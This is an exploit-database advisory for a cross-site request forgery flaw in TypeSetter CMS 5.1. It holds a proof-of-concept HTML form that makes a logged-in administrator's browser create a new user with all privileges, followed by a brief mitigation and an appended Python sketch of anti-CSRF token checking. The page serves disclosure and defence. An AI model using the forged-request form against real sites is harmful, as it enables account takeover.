
5 changes to exploits/shellcodes CloudMe Sync < 1.11.0 - Buffer Overflow Advantech WebAccess 8.3.0 - Remote Code Execution TypeSetter CMS 5.1 - 'Host' Header Injection TypeSetter CMS 5.1 - Cross-Site Request Forgery News Website Script 2.0.4 - 'search' SQL Injection
40 lines
No EOL
1.5 KiB
HTML
# Exploit Title: TypeSetter CMS 5.1 Cross Site Request Forgery
# Date: 10-02-2018
# Exploit Author: Navina Asrani
# Contact: https://twitter.com/NavinaSanjay
# Website: https://securitywarrior9.blogspot.in/
# Vendor Homepage: https://www.typesettercms.com/
# Version: 5.1
# CVE : NA
# Category: Webapp CMS

1. Description

The application allows malicious HTTP requests to be directly executed without any hidden security token. This may lead to user account takeover or malicious command execution.

2. Proof of Concept

Exploit code:

<html>
<body>
<form action="http://localhost/cms/Admin/Users" method="POST">
<input type="hidden" name="verified" value="475f10871b08f44c20dab5bc2cb55d17946e6c98fa8abf28c64a5a9dab0ee2e122fefcc29cae9cc2e48daf564bfe55665e26b2b2174dee14e83c5e6974cf3218" />
<input type="hidden" name="username" value="samrat_test" />
<input type="hidden" name="password" value="sam9318" />
<input type="hidden" name="password1" value="sam9318" />
<input type="hidden" name="algo" value="password_hash" />
<input type="hidden" name="email" value="sam9318@gmail.com" />
<input type="hidden" name="grant_all" value="all" />
<input type="hidden" name="cmd" value="newuser" />
<input type="hidden" name="aaa" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

3. Solution:

To mitigate the CSRF vulnerability, it is recommended to enforce security tokens such as anti-CSRF tokens.
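
The token check recommended in the Solution, sketched server-side as an added example (not TypeSetter's code and not part of the original advisory). The `csrf_token` field, the session layout and all function names are assumptions; only the `cmd=newuser` value and the form field names come from the PoC.

```python
import hashlib
import hmac
import secrets

# Hypothetical names throughout; this is not TypeSetter's implementation.
STATE_CHANGING_CMDS = {"newuser"}  # the cmd value submitted by the PoC form


def new_session() -> dict:
    """Create a session that carries its own random CSRF secret."""
    return {"id": secrets.token_hex(16), "csrf_secret": secrets.token_bytes(32)}


def issue_token(session: dict, action: str) -> str:
    """Token bound to both the session and the action it authorises."""
    msg = f"{session['id']}:{action}".encode()
    return hmac.new(session["csrf_secret"], msg, hashlib.sha256).hexdigest()


def handle_post(session: dict, form: dict) -> int:
    """Return the HTTP status for a POST to the user-admin endpoint."""
    cmd = form.get("cmd", "")
    if cmd in STATE_CHANGING_CMDS:
        expected = issue_token(session, cmd).encode()
        supplied = form.get("csrf_token", "").encode()
        # Constant-time compare; a missing or foreign token is rejected
        # before any account is created.
        if not hmac.compare_digest(expected, supplied):
            return 403
    return 200


def demo() -> tuple:
    """Constructed requests: cross-site, wrong-session token, legitimate."""
    admin, other = new_session(), new_session()
    # Constructed sample mirroring the PoC's field names, with no token.
    forged = {"username": "example_user", "grant_all": "all", "cmd": "newuser"}
    stolen = {**forged, "csrf_token": issue_token(other, "newuser")}
    legit = {**forged, "csrf_token": issue_token(admin, "newuser")}
    return (handle_post(admin, forged), handle_post(admin, stolen),
            handle_post(admin, legit))


if __name__ == "__main__":
    print(demo())
```

Because the token is derived from a per-session secret, a value pre-filled by another page or copied from a different session fails the comparison even though the browser still attaches the administrator's cookie.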